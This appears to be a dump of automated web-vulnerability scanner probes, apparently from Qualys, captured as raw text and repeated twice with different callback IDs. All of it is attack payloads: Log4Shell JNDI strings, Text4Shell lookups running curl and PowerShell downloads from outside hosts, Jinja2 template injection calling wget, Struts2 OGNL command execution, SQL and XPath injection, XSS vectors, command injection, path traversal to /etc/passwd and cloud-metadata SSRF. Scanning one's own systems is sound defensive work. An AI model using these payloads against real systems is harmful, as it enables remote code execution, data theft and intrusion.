iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@ ${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://915bfa855459cd8046145626b5c5525475fd2986.16312645147370345.448300997.oscomm14.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')} ${url:UTF-8::https://a7d5f9f4c22fd364b97ef01fee1189da0be13850.16312645147370345.3214085115.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas} ${url:UTF-8::https://af2822ee21170335907459333b806d0dd54926d6.16312645147370345.2639003322.oscomm17.oscomm.eu1.qualysperiscope.com./} ${url:UTF-8:http://84adc81d6aab462531f4be136d6feb7be7d1aa03.16312645147370345.2615172084.oscomm18.oscomm.eu1.qualysperiscope.com./} ${url:UTF-8:https://f457f66a096890274a6761f1205bc668b2b9adfa.16312645147370345.2826826984.oscomm19.oscomm.eu1.qualysperiscope.com./} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://c39c6ffe27e476e536d2a0232b8b80e573cd69db.16312645147370345.3635804760.oscomm20.oscomm.eu1.qualysperiscope.com.')} ${dns:address|a22296fd1209badba654af965ab660ca6e78f4f1.16312645147370345.544322438.oscomm21.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:http://ee01cc60d3fb3fa34439a0294718d06ed5046059.16312645147370345.3914813138.oscomm22.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:https://0fa999418c5db226f1bde9f2d6d7b96dbf19fc90.16312645147370345.5608982.oscomm23.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8::http://d3ac26cebffbb83a6ee455e3647ca76bdf9940be.16312645147370345.1779407973.oscomm24.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8::https://fe8e7d35a2df56abb76401374a6efb668c81689e.16312645147370345.2918940624.oscomm25.oscomm.eu1.qualysperiscope.com./} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://1ed777e8d0965896ed6504fd2664fd942c342cf7.16312645147370345.859796005.oscomm26.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://b546a5c029141a58deceea254e9115ab399a135d.16312645147370345.3199714239.oscomm27.oscomm.eu1.qualysperiscope.com.')} {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://735babacd4fafb1b0aed35284742ea4030f4605f.16312645147370345.2974464317.oscomm15019101.oscomm.eu1.qualysperiscope.com.').read() }} "'<svg/onload=alert(81) a=X2960462084Y2_2Z> ' onfocus=alert(81) autofocus=true onEvent=X2960462084Y2_2Z " onfocus=alert(81) autofocus=true onEvent=X2960462084Y2_2Z javascript:alert(81);qxss(X2960462084Y2_2Z); "><script>alert(81)</script> "'><script>alert(81)</script> z--><script>alert(81)</script> <script>alert(81)</script> "'><<SCRIPT a=2>alert(81);//<</SCRIPT> <IMG SRC=x onerror=alert(81)> <svg/onload=alert(81)> "><svg/onload=alert(81)> "'<svg/onload=alert(81) a=X2960462084Y2_2Z> ' onfocus=alert(81) autofocus=true onEvent=X2960462084Y2_2Z " onfocus=alert(81) autofocus=true onEvent=X2960462084Y2_2Z < script a=4>alert(81)< /script> %3cscript z%3ealert(81)%3c/script%3e javascript:alert(81);qxss(X2960462084Y2_2Z); ";alert(81);// ");alert(81);// ';alert(81);// 9;alert(81);// 9 ;alert(81);// */;alert(81);/* "*qxssstdlYQa7()*" '*qxssS90ho9TZ()*' '"/></script><script>function(){qxssWUe22aZ5};</script> ') or 2634=2634 -- ') and 2634=1123 -- ') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124 ') /* or __Q_1__ */aND 2634=1511 + 1124 -- oR 1123 ') /* or __Q_2__ */Or NULL IS NULL-- AnD 5867 ') /* or __Q_2__ */AnD 5867 IS NULL-- Or NULL ' or 3789=3789 -- ' and 3789=1391 -- ' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390 ' /* or __Q_1__ */aND 3789=2398 + 1390 -- oR 1391 ' /* or __Q_2__ */Or NULL IS NULL-- AnD 7643 ' /* or __Q_2__ */AnD 7643 IS NULL-- Or or 4325=4325 -- and 4325=2728 -- /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729 /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728 /* or __Q_2__ */Or NULL IS NULL -- AnD 3251 /* or __Q_2__ */AnD 3251 IS NULL -- Or or NULL IS NULL or 6248 IS NULL oR 6248=2491 + 3757 oR 6248=2491 + 3756 Or 6248=6248 Or 6248=3757 and NULL IS NULL and 7248 IS NULL aND 7248=2491 + 4757 aND 7248=2491 + 4756 AnD 7248=7248 AnD 7248=4757 ') or 'swqtp'='swqtp ') and 'swqtp'='ptqws ') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws ') /* or __Q_1__ */aND ' oR tyhjg'=' aND tyhgd ') /* or __Q_2__ */Or ' AnD aghjk'LIKE' AnD aghjk ') /* or __Q_2__ */AnD ' Or aghjk'LIKE' AnD jlgdf ' or 'tpklq'='tpklq ' and 'tpklq'='xqlkp ' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp ' /* or __Q_1__ */aND ' oR mktrs'=' aND ljhgy ' /* or __Q_2__ */Or ' AnD mjnfg'LIKE' AnD mjnfg ' /* or __Q_2__ */AnD ' Or mjnfg'LIKE' AnD fhdgr 1 or 11=11 1 or 11=12 5 oR 9=8 + 1 5 oR 9=9 + 1 6 Or 9=9 6 Or 9=8 ' or true() or 'and' = 'and ' and false() and 'or' = 'and ' or not(false()) or 'true' = 'true ' and not(true()) or 'false' = 'true ' or boolean(string-length('and')) or 'and' = 'and ' and boolean(string-length('')) and 'or' = 'and or true() or 'and' = 'and' and false() and 'or' = 'and' or not(false()) or 'true' = 'true' and not(true()) or 'false' = 'true' or boolean(string-length('and')) or 'and' = 'and' and boolean(string-length('')) and 'or' = 'and' " or true() or "and" = "and " and false() and "or" = "and " or not(false()) or "true" = "true " and not(true()) or "false" = "true " or boolean(string-length("and")) or "and" = "and " and boolean(string-length("")) and "or" = "and aaaa&ping -n 92 localhost& ping -c2 -i91 localhost |ping -c2 -i91 localhost |ping -c2 -i91 localhost| WAITFOR DELAY '00:00:29' ;WAITFOR DELAY '00:00:29'; );WAITFOR DELAY '00:00:29'-- ';WAITFOR DELAY '00:00:29'-- ');WAITFOR DELAY '00:00:29'-- ',0,0);WAITFOR DELAY'00:00:29'-- + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) ' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ' ;SELECT sleep(29); -- (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/ '; var djci=sleep(29*1000);// '; var djci=sleep(29*1000) + ' ' + sleep(29*100*Math.sqrt(100)) + ' (#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) "'><qss a=X148344452Y2_2Z> ' onEvent=X148344452Y2_2Z " onEvent=X148344452Y2_2Z javascript:qxss(X148344452Y2_2Z); "><qss7m0W0Wb0> "'><qss8Bvy385h> z--><qss85wVRH6x> "'><qssbWQr1Ulo `;!--=&{()}> <script>_q=random(X148344452Y2_2Z)</script> <script>_q_q=random(v7NZRa36)</script> <script src=//localhost/jVN11rgiI> <script =">" SRC=//localhost/j9U2Y5sj1> <SCRIPT/QSS3QDtbZBb SRC=//localhost/j> "'><<SCRIPT a=2>qss3c0f2FQ2=7;//<</SCRIPT> <IMG SRC=javascript:qssVTqjSCrL=7> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qssyF2Wlnap=7"> "><DIV STYLE="width:expression(qssK15lIja2=7)"> <STYLE type="text/css" a=3>BODY{background:url("javascript:qssYVcwgt36=7")}</STYLE> <EMBED SRC=//localhost/q51ko6BRL.swf AllowScriptAccess=always></EMBED> "'><qss a=X148344452Y2_2Z> ' onEvent=X148344452Y2_2Z " onEvent=X148344452Y2_2Z < script a=4>qss6H8x7DQr=7< /script> %3cscript z%3e_q(y)%3c/script%3e <script src=http://localhost/j qss{{q=(2*2.0)}}qss {{333*334}} q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA q Qualys_resp_hdr_injection: Vulnerable q Qualys_resp_hdr_injection: Vulnerable qualys<esi:comment text="" />was<!--esx-->esi ' ;-- # /* `` , ( 1e309 /../../../../../../../etc/passwd ../../../../../../../Windows/System32/drivers/etc/hosts php://filter/read=string.rot13/resource=/etc/passwd ....//....//....//....//....//....//etc/passwd %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} a(){}phpinfo(); function a |netstat -an http://rfitest/ javascript:qxss(X148344452Y2_2Z); ";(function(){qxss7Ei067xr});/**/" ");(function(){qxss7ij2KJi6});/**/" qualys(aqxssZ99s7D4Q)xyz ';(function(){qxss714t5t4C});/**/' 9;(function(){qxssI7c6B8yk});// 9 ;(function(){qxss3E1TNv1k});// */;(function(){qxssQh5AYRVE});/* '-qxssuZ0Bn1jH()-' "-qxss6HKHHco3()-" !@#$%^&*() !@#$%^&*() !@#$%^&*() |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %> {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} ;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */ (23.0231*213.759) <!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" --> </script><script>function(){qxssjI7M16EN};</script> http://169.254.169.254/latest/meta-data/ Joe+ bcc:was_engine@f3f601b5d2783d77dc8b18a8f63277691f6bc6cf.17512745147370345.3413684144.smtphi01.smtp.eu1.qualysperiscope.com. http://791b2e0341c82f4ea764edc9c330e9304c6aba86.17512745147370345.3683148379.ssrf01.ssrf.eu1.qualysperiscope.com. 7ce4839c49ad1d818c3db0736a6c0901b01d0ddb.17512745147370345.3307886294.ssrf02.ssrf.eu1.qualysperiscope.com. ${jndi:ldap://0bd368c445bb83ea36759e14e238420f5a4a5899.17512745147370345.2608000921.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:rmi://c75439b346455bf83dd8df59d148a92c29d46e67.17512745147370345.2416243239.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://ecda5be732aff5902421bf4b33bca9bf9d8400a5.17512745147370345.667990322.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://fbd57d7fe58803567c6f375eda2ab071bd55e824.17512745147370345.1385211366.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${::-n}di:ldap${::-:}//2454035ae207f3bb9299644de767684cf9cc8978.17512745147370345.2264757891.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS} ${jnd${123%ff:-${123%ff:-i:}}ldap://9bd0623b1f4f6520319bde27bca8aab38ef4ebbe.17512745147370345.1710080388.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS} ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//b46221f7e95c320a9311d8e62730851e70584931.17512745147370345.1694438192.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS} ${jndi:dns://0d1ae82e9c4e6fa6ef7f8aa868132766ec348511.17512745147370345.1309783020.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//f18e7c451034ced23f2d0c6a4c8b3a9255a8718b.17512745147370345.3929524979.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS} ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://5977ef5521f4ae9b6bf987f427a0ce49b7ef9a0f.17512745147370345.3817480615.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://4bc2c2d53787d39562d58964e101879c807b8f51.17512745147370345.2179381955.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://59886ae035dd1f952484692f8b0578dcb696bb02.17512745147370345.877186905.oscomm02.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')} ${dns:address|4f0c1b8b3dc579da4ea3ac41fc791c2ab23e60a5.17512745147370345.1381967162.oscomm04.oscomm.eu1.qualysperiscope.com.} $%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D ${url:UTF-8:http://927cc3b5be232312df75b9daff5446b114c6f29a.17512745147370345.4223379068.oscomm06.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:https://df786c5a71a94164ef567daa0e8a564a459901ce.17512745147370345.695582012.oscomm07.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@} ${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://a7a605e002074fabcd7e45ce034447771e0a718c.17512745147370345.3861597687.oscomm10.oscomm.eu1.qualysperiscope.com.')} powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@ ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://e6176eb9db15b3976861937b32df68a949578943.17512745147370345.2694559475.oscomm12.oscomm.eu1.qualysperiscope.com.')} powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@ ${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://7c971b91a32cf0e1da48c82991552c9cfd606501.17512745147370345.3023064803.oscomm14.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')} ${url:UTF-8::https://c874aa83464b1c0937a0a39f51a418be6dba2963.17512745147370345.2377610668.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas} ${url:UTF-8::https://b7b6619abe2c375d63c579d41ce131d4c3ca6a5c.17512745147370345.3722472653.oscomm17.oscomm.eu1.qualysperiscope.com./} ${url:UTF-8:http://ce2952a1a1771d2c563eb12e6ce14a74acc441b8.17512745147370345.3605137020.oscomm18.oscomm.eu1.qualysperiscope.com./} ${url:UTF-8:https://297c5501f2f28691844cb32bdedfd6f2b45b53b4.17512745147370345.2320017154.oscomm19.oscomm.eu1.qualysperiscope.com./} ${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://c5e15e2b3979ef56670c91f9cd808ff6a13a5254.17512745147370345.924356717.oscomm20.oscomm.eu1.qualysperiscope.com.')} ${dns:address|2c1dbd1ea2e5c444258d69a13f3c8d9ee583e048.17512745147370345.4000577920.oscomm21.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:http://ec319b2e0a8e6f251b9e5c1887f35b5d9b4f732d.17512745147370345.2215261513.oscomm22.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8:https://6dd1680685a48587b8d0eeef5a43fb4402807dd6.17512745147370345.1650094098.oscomm23.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8::http://ef15698048c552c27d6e7670152fa39defe299a0.17512745147370345.3272998104.oscomm24.oscomm.eu1.qualysperiscope.com.} ${url:UTF-8::https://c07d176ebdbdd4c44859ce5ccd88a10bc7b2aeb1.17512745147370345.916378240.oscomm25.oscomm.eu1.qualysperiscope.com./} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://0430b127a895a80d7414e091897e01c63b4ce045.17512745147370345.4143318776.oscomm26.oscomm.eu1.qualysperiscope.com.')} ${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://35ba28d634b5ba406b28daef503000639fe1863a.17512745147370345.2010045441.oscomm27.oscomm.eu1.qualysperiscope.com.')} {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://955edce026095e7bdc3572ed1a2b497053ffe75f.17512745147370345.62993143.oscomm15019101.oscomm.eu1.qualysperiscope.com.').read() }} "'<svg/onload=alert(81) a=X148344452Y2_2Z> ' onfocus=alert(81) autofocus=true onEvent=X148344452Y2_2Z " onfocus=alert(81) autofocus=true onEvent=X148344452Y2_2Z javascript:alert(81);qxss(X148344452Y2_2Z); "><script>alert(81)</script> "'><script>alert(81)</script> z--><script>alert(81)</script> <script>alert(81)</script> "'><<SCRIPT a=2>alert(81);//<</SCRIPT> <IMG SRC=x onerror=alert(81)> <svg/onload=alert(81)> "><svg/onload=alert(81)> "'<svg/onload=alert(81) a=X148344452Y2_2Z> ' onfocus=alert(81) autofocus=true onEvent=X148344452Y2_2Z " onfocus=alert(81) autofocus=true onEvent=X148344452Y2_2Z < script a=4>alert(81)< /script> %3cscript z%3ealert(81)%3c/script%3e javascript:alert(81);qxss(X148344452Y2_2Z); ";alert(81);// ");alert(81);// ';alert(81);// 9;alert(81);// 9 ;alert(81);// */;alert(81);/* "*qxssNSR420cO()*" '*qxss1n6mXRIb()*' '"/></script><script>function(){qxssZUob2F8m};</script> ') or 2634=2634 -- ') and 2634=1123 -- ') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124 ') /* or __Q_1__ */aND 2634=1511 + 1124 -- oR 1123 ') /* or __Q_2__ */Or NULL IS NULL-- AnD 5867 ') /* or __Q_2__ */AnD 5867 IS NULL-- Or NULL ' or 3789=3789 -- ' and 3789=1391 -- ' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390 ' /* or __Q_1__ */aND 3789=2398 + 1390 -- oR 1391 ' /* or __Q_2__ */Or NULL IS NULL-- AnD 7643 ' /* or __Q_2__ */AnD 7643 IS NULL-- Or or 4325=4325 -- and 4325=2728 -- /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729 /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728 /* or __Q_2__ */Or NULL IS NULL -- AnD 3251 /* or __Q_2__ */AnD 3251 IS NULL -- Or or NULL IS NULL or 6248 IS NULL oR 6248=2491 + 3757 oR 6248=2491 + 3756 Or 6248=6248 Or 6248=3757 and NULL IS NULL and 7248 IS NULL aND 7248=2491 + 4757 aND 7248=2491 + 4756 AnD 7248=7248 AnD 7248=4757 ') or 'swqtp'='swqtp ') and 'swqtp'='ptqws ') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws ') /* or __Q_1__ */aND ' oR tyhjg'=' aND tyhgd ') /* or __Q_2__ */Or ' AnD aghjk'LIKE' AnD aghjk ') /* or __Q_2__ */AnD ' Or aghjk'LIKE' AnD jlgdf ' or 'tpklq'='tpklq ' and 'tpklq'='xqlkp ' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp ' /* or __Q_1__ */aND ' oR mktrs'=' aND ljhgy ' /* or __Q_2__ */Or ' AnD mjnfg'LIKE' AnD mjnfg ' /* or __Q_2__ */AnD ' Or mjnfg'LIKE' AnD fhdgr 1 or 11=11 1 or 11=12 5 oR 9=8 + 1 5 oR 9=9 + 1 6 Or 9=9 6 Or 9=8 ' or true() or 'and' = 'and ' and false() and 'or' = 'and ' or not(false()) or 'true' = 'true ' and not(true()) or 'false' = 'true ' or boolean(string-length('and')) or 'and' = 'and ' and boolean(string-length('')) and 'or' = 'and or true() or 'and' = 'and' and false() and 'or' = 'and' or not(false()) or 'true' = 'true' and not(true()) or 'false' = 'true' or boolean(string-length('and')) or 'and' = 'and' and boolean(string-length('')) and 'or' = 'and' " or true() or "and" = "and " and false() and "or" = "and " or not(false()) or "true" = "true " and not(true()) or "false" = "true " or boolean(string-length("and")) or "and" = "and " and boolean(string-length("")) and "or" = "and aaaa&ping -n 92 localhost& ping -c2 -i91 localhost |ping -c2 -i56 localhost |ping -c2 -i91 localhost| WAITFOR DELAY '00:00:29' ;WAITFOR DELAY '00:00:29'; );WAITFOR DELAY '00:00:29'-- ';WAITFOR DELAY '00:00:29'-- ');WAITFOR DELAY '00:00:29'-- ',0,0);WAITFOR DELAY'00:00:29'-- + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) ' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ' ;SELECT sleep(29); -- (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/ ' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime ' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys '; var djci=sleep(29*1000);// '; var djci=sleep(29*1000) + ' ' + sleep(29*100*Math.sqrt(100)) + ' (#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))